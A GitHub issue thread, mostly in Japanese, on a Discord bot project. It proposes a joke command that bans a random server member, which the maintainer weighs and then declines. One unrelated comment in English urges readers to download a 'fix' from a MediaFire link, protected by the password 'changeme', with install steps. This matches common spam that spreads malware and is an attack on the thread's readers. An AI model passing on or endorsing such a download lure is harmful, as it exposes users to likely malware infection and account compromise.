### ISSUE TITLE
【新コマンド/New Command】ランダム処刑コマンド

### ISSUE THREAD

**Issue by Hachigigadesuu** [Ks-777/ShibakenBot#3]
## チェックリスト
- [x] そのコマンドは他のBOTなどを参考にしましたか？(オリジナルかそうでないか)
参考にしたBOTなどの名前:
- [x] その機能と類似したものが実装されていますか？またそのIssueが過去に建てられていませんか？
___
## コマンド名
コマンド名:/randomselect
説明(簡単に):ランダムで一人BANします。
### 系統
- [ ] 便利系
- [x] お遊び系
- [ ] モデレート系
- [ ] その他

## コマンドの説明 
このコマンドはランダムで一人が選出され、BANされます。設定次第で色々なこともできます。例えばMUTEやTOなど。

## 挙動(詳しく) 
banされると @○○ はbanされました!! と埋め込みメッセージが全員に表示されます

## その他

<!--ありがとう|Thanks.>

**Comment by Ks-777** [comment]
BANはアレだけどmuteとかタイムアウトをするぐらいなら....いいのか...?
とりあえず検討しようかな

**Comment by Ks-777** [comment]
あとタイトル書いといてくれよ()

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Ks-777** [comment]
ネタ系に走らない方針になったので不採用でクローズ
